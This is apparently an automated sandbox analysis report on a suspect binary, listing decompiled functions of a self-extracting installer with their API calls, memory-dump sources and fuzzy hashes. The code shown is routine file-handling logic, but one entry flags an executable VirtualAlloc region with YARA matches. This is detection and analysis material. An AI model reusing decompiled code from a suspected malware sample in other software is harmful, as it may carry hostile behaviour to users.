                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00404DB5
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00404DDD
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AttributesFileItemText
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                    • API String ID: 3625706803-2312194364
                                                                                                                                                                                                                                    • Opcode ID: 257c9b6a3856b41c8a69c04874ddfb44c6bdef15d5f4cd6bd326d1538e73eac5
                                                                                                                                                                                                                                    • Instruction ID: 31e8ee9ec96c77640c407dc2e3c45d8f9ad1bcb24b75663886ce4ee65fd8817f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 257c9b6a3856b41c8a69c04874ddfb44c6bdef15d5f4cd6bd326d1538e73eac5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 244123B62001019BCB219F38ED446B673A5AFC5304B04467FDE86B72D1DA39DE4AC798
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00404C37 Relevance: 4.5, APIs: 3, Instructions: 39timeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00404C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0x408d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0x408d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}








                                                                                                                                                                                                                                    0x00404c40
                                                                                                                                                                                                                                    0x00404c4a
                                                                                                                                                                                                                                    0x00404c8d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404c70
                                                                                                                                                                                                                                    0x00404c70
                                                                                                                                                                                                                                    0x00404c7e
                                                                                                                                                                                                                                    0x00404c86
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404c8a

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00404C54
                                                                                                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00404C66
                                                                                                                                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00404C7E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2071732420-0
                                                                                                                                                                                                                                    • Opcode ID: de3d8c8ad82764a1cfb484c9646f0635e09601b8f48d0e66528622655dc2b5f2
                                                                                                                                                                                                                                    • Instruction ID: 26a6f2e907af393bf0761dda356fb09445650c1bae6419f8d7bc6e601a313ac9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de3d8c8ad82764a1cfb484c9646f0635e09601b8f48d0e66528622655dc2b5f2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BEF090B260520CAFFB24DFB4CD48DBB77ACEB44250B44453FAA16E11D0EA34D924C7A9
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0040487A Relevance: 3.1, APIs: 2, Instructions: 59fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                    			E0040487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E0040490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}







                                                                                                                                                                                                                                    0x00404880
                                                                                                                                                                                                                                    0x0040488c
                                                                                                                                                                                                                                    0x00404894
                                                                                                                                                                                                                                    0x004048a0
                                                                                                                                                                                                                                    0x004048c9
                                                                                                                                                                                                                                    0x004048ce
                                                                                                                                                                                                                                    0x004048a2
                                                                                                                                                                                                                                    0x004048a8
                                                                                                                                                                                                                                    0x004048b7
                                                                                                                                                                                                                                    0x004048bc
                                                                                                                                                                                                                                    0x004048aa
                                                                                                                                                                                                                                    0x004048ac
                                                                                                                                                                                                                                    0x004048ac
                                                                                                                                                                                                                                    0x004048a8
                                                                                                                                                                                                                                    0x004048de
                                                                                                                                                                                                                                    0x004048e7
                                                                                                                                                                                                                                    0x0040490b
                                                                                                                                                                                                                                    0x004048ee
                                                                                                                                                                                                                                    0x004048f0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404902

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00404A23,?,00404F67,*MEMCAB,00008000,00000180), ref: 004048DE
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00404F67,*MEMCAB,00008000,00000180), ref: 00404902
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                                    • Opcode ID: fadf226ed69bbb41dbb50a9d93363128b59b8e1147c1ebbdb1745835005b5b17
                                                                                                                                                                                                                                    • Instruction ID: dce78edff5e7a467645b78d59c04aaa4689d7eeda0cc1ba10610c6ef675d671e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fadf226ed69bbb41dbb50a9d93363128b59b8e1147c1ebbdb1745835005b5b17
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B00128E7E116702AF22450294C88FB7551C8BD6634F1A4736BEAABA2D2D5784C0481E8
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00404AD0 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E00404AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x40858c; // 0x154
				_t9 = E00403680(_t20);
				if( *0x4091d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0x408d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x409400; // 0x10a200
							_t15 = _t14 + _t25;
							 *0x409400 = _t15;
							if( *0x408184 != 0) {
								_t21 =  *0x408584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x4093f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}











                                                                                                                                                                                                                                    0x00404ad5
                                                                                                                                                                                                                                    0x00404adb
                                                                                                                                                                                                                                    0x00404ae7
                                                                                                                                                                                                                                    0x00404aee
                                                                                                                                                                                                                                    0x00404b05
                                                                                                                                                                                                                                    0x00404b0d
                                                                                                                                                                                                                                    0x00404b14
                                                                                                                                                                                                                                    0x00404b1a
                                                                                                                                                                                                                                    0x00404b1c
                                                                                                                                                                                                                                    0x00404b21
                                                                                                                                                                                                                                    0x00404b2a
                                                                                                                                                                                                                                    0x00404b2f
                                                                                                                                                                                                                                    0x00404b31
                                                                                                                                                                                                                                    0x00404b39
                                                                                                                                                                                                                                    0x00404b54
                                                                                                                                                                                                                                    0x00404b54
                                                                                                                                                                                                                                    0x00404b39
                                                                                                                                                                                                                                    0x00404b2f
                                                                                                                                                                                                                                    0x00404b0f
                                                                                                                                                                                                                                    0x00404b0f
                                                                                                                                                                                                                                    0x00404b0f
                                                                                                                                                                                                                                    0x00404b5e
                                                                                                                                                                                                                                    0x00404ae9
                                                                                                                                                                                                                                    0x00404aed
                                                                                                                                                                                                                                    0x00404aed

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00403680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0040369F
                                                                                                                                                                                                                                      • Part of subcall function 00403680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004036B2
                                                                                                                                                                                                                                      • Part of subcall function 00403680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004036DA
                                                                                                                                                                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00404B05
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1084409-0
                                                                                                                                                                                                                                    • Opcode ID: ab6259a8a4d2dd022a3c8d33f5e1e8a15f83e3210f04ee4509b3a011844fb6d6
                                                                                                                                                                                                                                    • Instruction ID: 7cceea35d73159b26d1b83d1328ee4e94251b7085b3a179f835f58e33a962e09
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab6259a8a4d2dd022a3c8d33f5e1e8a15f83e3210f04ee4509b3a011844fb6d6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74018071200205ABDB149F59DE05BA27769AB84725F04823AFA39BB2E1CB74DC11CB58
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0040658A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E0040658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x408b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0x408b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E004016B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}












                                                                                                                                                                                                                                    0x00406592
                                                                                                                                                                                                                                    0x00406594
                                                                                                                                                                                                                                    0x00406596
                                                                                                                                                                                                                                    0x00406598
                                                                                                                                                                                                                                    0x00406598
                                                                                                                                                                                                                                    0x0040659b
                                                                                                                                                                                                                                    0x0040659b
                                                                                                                                                                                                                                    0x0040659d
                                                                                                                                                                                                                                    0x0040659e
                                                                                                                                                                                                                                    0x004065a2
                                                                                                                                                                                                                                    0x004065a4
                                                                                                                                                                                                                                    0x004065a9
                                                                                                                                                                                                                                    0x004065b2
                                                                                                                                                                                                                                    0x004065b6
                                                                                                                                                                                                                                    0x004065ba
                                                                                                                                                                                                                                    0x004065c3
                                                                                                                                                                                                                                    0x004065c5
                                                                                                                                                                                                                                    0x004065c8
                                                                                                                                                                                                                                    0x004065c8
                                                                                                                                                                                                                                    0x004065c3
                                                                                                                                                                                                                                    0x004065c9
                                                                                                                                                                                                                                    0x004065cc
                                                                                                                                                                                                                                    0x004065d2
                                                                                                                                                                                                                                    0x004065d1
                                                                                                                                                                                                                                    0x004065d1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004065dc
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CharPrevA.USER32(00408B3E,00408B3F,00000001,00408B3E,-00000003,?,004060EC,00401140,?), ref: 004065BA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CharPrev
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 122130370-0
                                                                                                                                                                                                                                    • Opcode ID: b08d9a994ba15229853f1fb0455e3b44e106027da8ecf514dd4033e1e77c22ce
                                                                                                                                                                                                                                    • Instruction ID: 40dc54a50ef1d9b939454141e84776cfaea9ff212e965cea6d62fa9ba78ea7d4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b08d9a994ba15229853f1fb0455e3b44e106027da8ecf514dd4033e1e77c22ce
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3F02D32104250BFD3314919BC84B67BFDD9B86350F16017FE8DBA3385CA7D4D5682A9
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0040621E Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E0040621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x408004; // 0x8f135e3b
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E0040597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E004044B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x409124 = E00406285();
					_t9 = 0;
				}
				return E00406CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}











                                                                                                                                                                                                                                    0x00406229
                                                                                                                                                                                                                                    0x00406230
                                                                                                                                                                                                                                    0x00406247
                                                                                                                                                                                                                                    0x0040626a
                                                                                                                                                                                                                                    0x00406272
                                                                                                                                                                                                                                    0x00406249
                                                                                                                                                                                                                                    0x00406255
                                                                                                                                                                                                                                    0x0040625f
                                                                                                                                                                                                                                    0x00406264
                                                                                                                                                                                                                                    0x00406264
                                                                                                                                                                                                                                    0x00406284

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040623F
                                                                                                                                                                                                                                      • Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
                                                                                                                                                                                                                                      • Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554
                                                                                                                                                                                                                                      • Part of subcall function 00406285: GetLastError.KERNEL32(00405BBC), ref: 00406285
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 381621628-0
                                                                                                                                                                                                                                    • Opcode ID: 3325270bcf1ca384f477d4cfa035b617f289eb05c34c13c48fc71639da7fe5a9
                                                                                                                                                                                                                                    • Instruction ID: c9fc7c92a7cec4c9f4a35bfa16e57d250416f75581f2c593a26caa7fdf97897f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3325270bcf1ca384f477d4cfa035b617f289eb05c34c13c48fc71639da7fe5a9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49F0B4B07042086BE750FB758E02FBA32A8DB44304F4100BFBA86F61D1DD789D648658
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00404B60 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00404B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0x408d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0x408d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0x408d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0x408d60)) = 1;
				 *((intOrPtr*)(_t15 + 0x408d68)) = 0;
				 *((intOrPtr*)(_t15 + 0x408d70)) = 0;
				 *((intOrPtr*)(_t15 + 0x408d6c)) = 0;
				return 0;
			}





                                                                                                                                                                                                                                    0x00404b66
                                                                                                                                                                                                                                    0x00404b74
                                                                                                                                                                                                                                    0x00404b98
                                                                                                                                                                                                                                    0x00404ba0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404bac
                                                                                                                                                                                                                                    0x00404ba4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404ba4
                                                                                                                                                                                                                                    0x00404b78
                                                                                                                                                                                                                                    0x00404b7e
                                                                                                                                                                                                                                    0x00404b84
                                                                                                                                                                                                                                    0x00404b8a
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00404FA1,00000000), ref: 00404B98
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2591292051-0
                                                                                                                                                                                                                                    • Opcode ID: 81f8c292e8a167303dab4fee7506f6ace6dbeb9d23bbb5b0b049432824c4c0aa
                                                                                                                                                                                                                                    • Instruction ID: b92c02e1d42775b4d64c1b480fc1218859da62ddf6c23338d971301b0ff3d73c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81f8c292e8a167303dab4fee7506f6ace6dbeb9d23bbb5b0b049432824c4c0aa
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4F0FE71500B089EC7618E398E00653BBE4AED53603100A3F95EEF21D0EB34A871DB98
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 004066AE Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E004066AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}




                                                                                                                                                                                                                                    0x004066b1
                                                                                                                                                                                                                                    0x004066ba
                                                                                                                                                                                                                                    0x004066c7
                                                                                                                                                                                                                                    0x004066bc
                                                                                                                                                                                                                                    0x004066be
                                                                                                                                                                                                                                    0x004066be

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,00404777,?,00404E38,?), ref: 004066B1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                                    • Opcode ID: c7a10a2f911a57d7b615a8355233fd4650d5e9e4080771bf9336d98f7453a15a
                                                                                                                                                                                                                                    • Instruction ID: b0bf721a4a9401975da429cbe36b66188ee692fd53fb4aa260148cb1fc4dfac4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7a10a2f911a57d7b615a8355233fd4650d5e9e4080771bf9336d98f7453a15a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0B0927662254442AA200A316C2995A2845A6C123A7E52BA1F033E02E0CA3EC8A6D008
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 06902485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 069024D6
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.447521600.0000000006902000.00000040.00000020.00020000.00000000.sdmp, Offset: 06902000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6902000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                    • Instruction ID: 1fbfd9e400b4fe012d663d2caeefea7702bb87c9de692c223b9f7e82625e4505
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C113C79A00208EFDB41DF98C989E99BBF5EF08350F158094F9489B361D371EA90DF84
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00404CA0 Relevance: 1.3, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00404CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                                    0x00404caa
                                                                                                                                                                                                                                    0x00404cb1

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000000,?), ref: 00404CAA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocGlobal
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3761449716-0
                                                                                                                                                                                                                                    • Opcode ID: e8dfc452646d7158c2cb1bd13dfe0e4dba9c7bd9453fa8bfc8256f8e446bf251
                                                                                                                                                                                                                                    • Instruction ID: 9573c9426388a2d7b89283d718c50bbdfd09632f04378d08ec902689231ba7f3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8dfc452646d7158c2cb1bd13dfe0e4dba9c7bd9453fa8bfc8256f8e446bf251
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83B0123204430CB7CF001FC2EC09F853F1DE7C4761F140010FA0C450508A729420869B
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00404CC0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00404CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                                    0x00404cc8
                                                                                                                                                                                                                                    0x00404ccf

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
